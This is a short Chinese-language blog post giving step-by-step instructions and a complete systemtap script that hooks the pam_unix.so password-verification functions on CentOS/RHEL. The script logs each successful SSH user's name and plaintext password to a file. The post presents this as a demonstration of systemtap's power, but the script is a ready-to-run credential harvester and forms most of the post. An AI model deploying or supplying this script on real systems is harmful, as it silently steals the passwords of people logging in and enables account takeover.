CentOS/RHEL 如何获取SSH登陆的用户名和密码

CentOS osetc 424℃ 0评论

systemtap是一款非常强大内核调试工具,可以debug很多关于kernel层的问题。Linux是通过PAM模块检测用户信息和认证信息的,从而确定一个用户是否可以登录系统,利用这个知识点,使用systemtap捕获一下pam_unix.so该动态库文件的函数调用,获得用户在ssh远程登录时的用户名和密码吧。
测试环境:CentOS6.4 32bit
内核版本:2.6.32-358.el6.i686

首先安装以下rpm包

1
2
3
yum --releasever=6.4 update
yum install -y systemtap
debuginfo-install $(rpm -qf /lib/security/pam_unix.so)

创建文件,写入以下代码

1
touch /root/capture_pass.stp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
· #!/usr/bin/stap
· global username, pass, isSuccRet = 1;
· probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
· {
· username = user_string($name);
· pass = user_string($p);
· }
· probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
· {
· if ($return == 0)
· {
· printf("User: %s\nPassword: %s\n\n", username, pass);
· isSuccRet = 0;
· }
· }
· probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
· {
· if (isSuccRet != 0)
· {
· printf("Login via ssh service.\n\User: %s\nPassword: %s\n\n", username, pass);
· }
· isSuccRet = 1;
· }

赋予可执行权限

1
chmod +x capture_pass.stp

创建一个记录密码的文件

1
touch password.txt

执行systemstap脚本

1
stap capture_pass.stp -o password.txt

systemtap
本地执行capture_pass.stp脚本,同时ssh远程登录系统,即使第一次登录失败也没有问题,不会记录尝试输入的错误密码。登录成功后ctl+C终止脚本运行,查看password.txt,成功捕获。systemstap很强大的利器,所以只有超户可以使用。

systemtap

原文

转载请注明:osetc.com » CentOS/RHEL 如何获取SSH登陆的用户名和密码

喜欢 (0)or分享 (0)
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址